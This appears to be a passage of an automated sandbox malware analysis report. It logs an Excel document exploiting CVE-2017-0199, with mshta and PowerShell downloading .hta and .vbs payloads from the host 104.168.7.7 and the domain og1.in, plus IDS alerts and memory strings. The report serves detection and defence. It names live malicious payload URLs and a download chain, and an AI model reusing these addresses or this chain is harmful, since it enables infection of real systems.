Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49168 -> 104.168.7.7:80
Source: Network traffic	Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 104.168.7.7:80 -> 192.168.2.22:49168
Source: Network traffic	Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49166 -> 104.168.7.7:80
Source: Network traffic	Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 104.168.7.7:80 -> 192.168.2.22:49166

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /Ts9zje HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Ts9zje HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /356/ce/IEnetbookupdateion.hta HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.7.7Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /356/ce/IEnetbookupdateion.hta HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 104.168.7.7If-Range: "1cecc-6234bd0fe5c83"
Source: global traffic	HTTP traffic detected: GET /356/IEnetbookupdation.vbs HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.7.7Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 7_2_000007FE899C7018 URLDownloadToFileW,

7_2_000007FE899C7018

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6ACC71F0.emf

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /Ts9zje HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Ts9zje HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /356/ce/IEnetbookupdateion.hta HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.7.7Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /356/ce/IEnetbookupdateion.hta HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 104.168.7.7If-Range: "1cecc-6234bd0fe5c83"
Source: global traffic	HTTP traffic detected: GET /356/IEnetbookupdation.vbs HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.7.7Connection: Keep-Alive

Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic

DNS traffic detected: DNS query: og1.in

Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://104.168.7.7/
Source: powershell.exe, 00000007.00000002.517798504.00000000029D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://104.168.7.7/356/IEnetbook
Source: powershell.exe, 00000007.00000002.517798504.00000000029D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://104.168.7.7/356/IEnetbookupdation.vbs
Source: powershell.exe, 00000007.00000002.520144813.000000001A772000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://104.168.7.7/356/IEnetbookupdation.vbsiptor
Source: powershell.exe, 00000007.00000002.517798504.00000000029D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://104.168.7.7/356/IEnetbookupdation.vbsp
Source: mshta.exe, 00000004.00000003.487027748.0000000000321000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486739919.00000000036FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486308977.0000000000366000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486308977.0000000000321000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487744371.0000000000366000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487744371.0000000000321000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487027748.0000000000366000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 